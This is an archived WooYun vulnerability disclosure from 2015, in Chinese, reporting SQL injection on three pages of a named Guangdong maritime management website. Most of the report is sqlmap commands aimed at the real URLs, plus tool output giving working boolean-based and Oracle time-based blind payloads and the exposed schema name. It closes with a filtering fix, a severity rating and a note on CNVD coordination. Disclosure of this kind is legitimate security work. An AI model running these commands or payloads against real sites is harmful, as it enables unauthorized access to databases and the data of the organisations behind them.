乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-03: 细节已通知厂商并且等待厂商处理中 2015-07-07: 厂商已经确认,细节仅向厂商公开 2015-07-17: 细节向核心白帽子及相关领域专家公开 2015-07-27: 细节向普通白帽子公开 2015-08-06: 细节向实习白帽子公开 2015-08-21: 细节向公众公开
注入点:sqlmap.py -u "http://www.gdhydro.com/MaritimeManage/portal/news/pic_news.jsp?columnId=3"
参数:columnId
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: columnId (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: columnId=3 AND 4794=4794 Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: columnId=3 AND 2340=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(74)||CHR(116)||CHR(65),5)---web application technology: JSPback-end DBMS: Oraclecurrent schema (equivalent to database on Oracle): 'MARITIME'
注入二:sqlmap.py -u "http://www.gdhydro.com/MaritimeManage/portal/navigationBookInfo/checkimg.jsp?imgid=354"
参数:imgid
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: imgid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: imgid=354' AND 8125=8125 AND 'HwGq'='HwGq Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: imgid=354' AND 1224=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(97)||CHR(65)||CHR(101),5) AND 'SrYE'='SrYE---web application technology: JSPback-end DBMS: Oraclecurrent schema (equivalent to database on Oracle): 'MARITIME'
注入三:sqlmap.py -u "http://www.gdhydro.com/MaritimeManage/portal/news/news_list.jsp?sectionName=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%CF%A2&columnId=49"
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: columnId (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: sectionName=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%CF%A2&columnId=49 AND 2390=2390 Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: sectionName=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%CF%A2&columnId=49 AND 7717=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(122)||CHR(72)||CHR(107),5)---web application technology: JSPback-end DBMS: Oraclecurrent schema (equivalent to database on Oracle): 'MARITIME'
参数过滤
危害等级:中
漏洞Rank:9
确认时间:2015-07-07 09:37
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给广东分中心,由广东分中心后续协调网站管理单位处置。
暂无